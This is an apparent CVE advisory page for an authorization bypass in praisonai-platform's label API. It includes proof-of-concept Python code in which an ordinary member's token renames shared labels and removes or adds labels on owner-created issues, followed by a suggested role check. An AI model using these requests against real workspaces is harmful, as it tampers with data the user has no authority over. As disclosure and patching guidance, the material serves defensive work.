PraisonAI Platform, Authorization Bypass, CVE-2026-47414 (Medium) -DC-Oct2026-2991

Listen to this Post

An authorization bypass vulnerability exists within the praisonai-platform API routes for handling shared labels and issue-label associations. Specifically, ordinary workspace members are able to modify shared label names and colors, as well as add or remove labels from owner-created issues. While direct label deletion correctly restricts access to workspace administrators and owners returning a 403 status code, the corresponding PATCH and POST endpoints lack proper role verification checks. Consequently, authenticated users with standard member privileges can manipulate workspace triage metadata and workflow states without holding administrative authority, resulting in a loss of integrity over the project taxonomy.

DailyCVE Form:

Platform: praisonai-platform
Version: 0.1.6 – 0.1.8
Vulnerability: Authorization Bypass
Severity: Medium
date: 2026-06-17

Prediction: 2026-07-01

What Undercode Say

async def _run(repo: Path | None) -> dict[str, Any]:
os.environ["PLATFORM_JWT_SECRET"] = "local-poc-secret-32-bytes-minimum"
_load_local_source(repo)
from httpx import ASGITransport, AsyncClient
from sqlalchemy.ext.asyncio import create_async_engine
from praisonai_platform.api.app import create_app
from praisonai_platform.db import base as base_mod
from praisonai_platform.db.base import Base, reset_engine
await reset_engine()
engine = create_async_engine(
"sqlite+aiosqlite:///:memory:",
echo=False,
connect_args={"check_same_thread": False},
)
base_mod._engine = engine
base_mod._session_factory = None
async with engine.begin() as conn:
await conn.run_sync(Base.metadata.create_all)
app = create_app()
transport = ASGITransport(app=app)
async with AsyncClient(transport=transport, base_url="http://local-poc") as client:
owner_token, _owner_id = await _register(client, "[email protected]", "Owner")
member_token, member_id = await _register(client, "[email protected]", "Member")

Exploit: (Educational Purposes!)

member_patch_label = await client.patch(
f"/api/v1/workspaces/{workspace_id}/labels/{label_id}",
json={"name": "Member-controlled triage", "color": "000000"},
headers=member_headers,
)
member_remove_from_owner_issue = await client.delete(
f"/api/v1/workspaces/{workspace_id}/issues/{owner_issue_id}/labels/{label_id}",
headers=member_headers,
)
member_add_back_to_owner_issue = await client.post(
f"/api/v1/workspaces/{workspace_id}/issues/{owner_issue_id}/labels/{label_id}",
headers=member_headers,
)

Protection:

def require_label_management_permission(workspace_id: str, user: AuthIdentity, session: AsyncSession):
if not user.is_admin and not user.is_owner:
raise HTTPException(status_code=403, detail="Admin or owner authority required for label modifications")

Impact:

An ordinary workspace member can silently alter shared triage labels and modify label assignments on owner-created issues, removing them from filtered boards or changing their meanings. This leads to a total loss of integrity over the workflow and triage state within shared workspaces.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top